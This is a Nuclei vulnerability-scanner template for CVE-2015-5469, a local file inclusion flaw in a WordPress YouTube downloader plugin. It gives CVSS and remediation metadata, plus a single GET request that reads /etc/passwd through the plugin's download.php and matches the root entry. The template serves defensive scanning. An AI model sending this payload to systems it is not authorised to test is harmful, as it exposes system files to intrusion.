nuclei-templates/http/cves/2015/CVE-2015-5469.yaml

44 lines
1.4 KiB
YAML
Raw Normal View History

2022-08-12 02:52:43 +00:00
id: CVE-2015-5469
2022-08-12 02:52:43 +00:00
info:
name: WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion
2022-08-12 02:52:43 +00:00
author: 0x_Akoko
severity: high
description: WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php.
2023-09-06 13:22:34 +00:00
remediation: |
Update to the latest version of WordPress MDC YouTube Downloader plugin or apply the patch provided by the vendor.
2022-08-12 02:52:43 +00:00
reference:
- https://www.openwall.com/lists/oss-security/2015/07/10/5
- http://www.vapid.dhs.org/advisory.php?v=133
- http://www.openwall.com/lists/oss-security/2015/07/10/5
- https://nvd.nist.gov/vuln/detail/CVE-2015-5469
2022-08-12 02:52:43 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-5469
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.02176
2023-08-31 11:46:18 +00:00
epss-percentile: 0.87946
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: mdc_youtube_downloader_project
product: mdc_youtube_downloader
2023-09-06 13:22:34 +00:00
framework: wordpress
2023-07-11 19:49:27 +00:00
tags: cve,cve2015,wp,lfi
2022-08-12 02:52:43 +00:00
http:
2022-08-12 02:52:43 +00:00
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200